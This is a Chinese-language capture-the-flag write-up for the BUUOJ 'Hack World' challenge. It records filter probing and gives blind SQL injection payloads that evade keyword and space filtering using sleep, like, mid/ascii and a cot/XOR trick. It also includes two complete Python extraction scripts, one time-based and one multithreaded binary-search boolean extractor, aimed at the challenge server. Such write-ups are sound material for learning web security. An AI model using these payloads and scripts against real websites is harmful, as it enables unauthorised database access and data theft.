首先用sqlmap跑一跑没有结果
尝试输入，测试注入点和过滤

1'  bool(false) 
1'# SQL Injection Checked.
1'%23  bool(false) 
1' %23  Injection Checked.
1%23  Hello, glzjin wants a girlfriend.

可以发现，只要被过滤了就会显示SQL Injection Checked，通过测试
过滤了and&&、 or||、 空格 、# 、for、limit

明显的注入,但是过滤空格,*,%23%0a,limit,for等等,明显的盲注
通过测试sleep((select(flag)from(flag)where(flag)like('f%'))like('f%'))可以成功延时,构造脚本
过滤空格,*,%23%0a,limit,for
后面再回头想了一下,flag表就一条数据,不能用limit也不需要用like构造的这么复杂,可以构造sleep(ascii(mid((select(flag)from(flag)),1,1))=102)
然后看glzjin师傅的wp却是布尔型盲注
1^(cot(ascii(mid((select(flag)from(flag)),1,1))=102))^1
其中的cot函数的作用是求余切值,会得到0.6这样,最后通过异或和四舍五入最后为1(我也不是很懂为什么一定要cot)

这里讲一下like

例子
我们希望从上面的 "Persons" 表中选取居住在以 "N" 开始的城市里的人：
我们可以使用下面的 SELECT 语句：
SELECT * FROM Persons
WHERE City LIKE 'N%'
提示："%" 可用于定义通配符（模式中缺少的字母）。
sqlmap中也有用like代替=

图片.png

图片.png

代码

import requests
def six_six_six(url):
    flag = ''
    while True:
        for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_':
            data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)}
            print(data)
            try:
                requests.post(url=url,data=data,timeout=1)
            except:
                flag=flag+i
                print('[*]%s'%flag)
                break
        if i=='}':
            break
    print('[+]%s'%flag)

url = 'http://web43.buuoj.cn'
six_six_six(url)

还可以通过布尔盲注进行,有两种返回结果

-1=(ascii(substr((select    flag    from    flag),1,1))>120)

我比较菜鸡，一开始怎么也看不出这个脚本的意思，经过一波测试

-1=(158=58) 返回Hello, glzjin wants a girlfriend.
-1=(58=58)返回Error Occured When Fetch Result.
-1=(158>58)返回Error Occured When Fetch Result.
-1=(158<58) 返回Hello, glzjin wants a girlfriend.

还是不太懂为什么这么构造，
这里可以揣摩出大概意思是（）里的判断为true返回Error Occured When Fetch Result.（也就是flase）；
（）里的判断为flase返回Hello, glzjin wants a girlfriend.也就是id=1查询出的内容（也就是true）

原因是-1=flase，返回1？
-1=true，返回flase？
这样看来确实没有必要用and和or了

上脚本

import requests, threading
z = {}
def fast(n):
    R, L = 126, 30
    m = 0
    while R >= L:
        m = (R + L) // 2
        #payload = '-1=(ascii(substr((select    flag    from    flag),{0},1))>{1})'.format(n, m)
        payload = '-1=(ascii(mid((select(flag)from(flag)),{0},1))>{1})'.format(n, m)
        data = {"id": payload}

        if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
            payload = '-1=(ascii(substr((select flag    from    flag),{0},1))={1})'.format(n, m + 1)
            data = {"id": payload}
        #如果不返回Hello, glzjin wants a girlfriend，语句为真，ascii(flag[n])>m，构造判断ascii(flag[n])=m+1?
            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
                z[n] = chr(m + 1)
                print(chr(m + 1))
                break
            #如果不返回Hello, glzjin wants a girlfriend，语句为真，返回flag[n],break,跳出
            L = m + 1#直到R>L,这里L每次增加到m+1，二分法
            print(m)

        else:
            payload = '-1=(ascii(substr((select flag    from    flag),{0},1))={1})'.format(n, m - 1)
            data = {"id": payload}
            if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
                z[n] = chr(m - 1)
                print(chr(m - 1))
                break
            R = m - 1


a = []#创建threads数组a[]
for x in range(1, 39):#这里的39需要自己测试，从小到大测试
    a.append(threading.Thread(target=fast, args=(x,)))#创建线程,使用threading.Thread()方法，在这个方法中调用fast方法target=fast，args方法对fast进行传参。 把创建好的线程装到threads数组a[]中。
for x in a:
    x.start()#最后通过for循环遍历线程数组。
for x in a:
    x.join()#join（）的作用是，在子线程完成运行之前，这个子线程的父线程将一直被阻塞。注意:  join()方法的位置是在for循环外的，也就是说必须等待for循环里的两个进程都结束后，才去执行主进程。
f = ''
for x in range(1, 39):
    f += z[x]
print(f)
print('ok')

参考文章
http://118.25.174.93/index.php/archives/694/#Hack%20World
http://cdusec.happyhacking.top/?post=78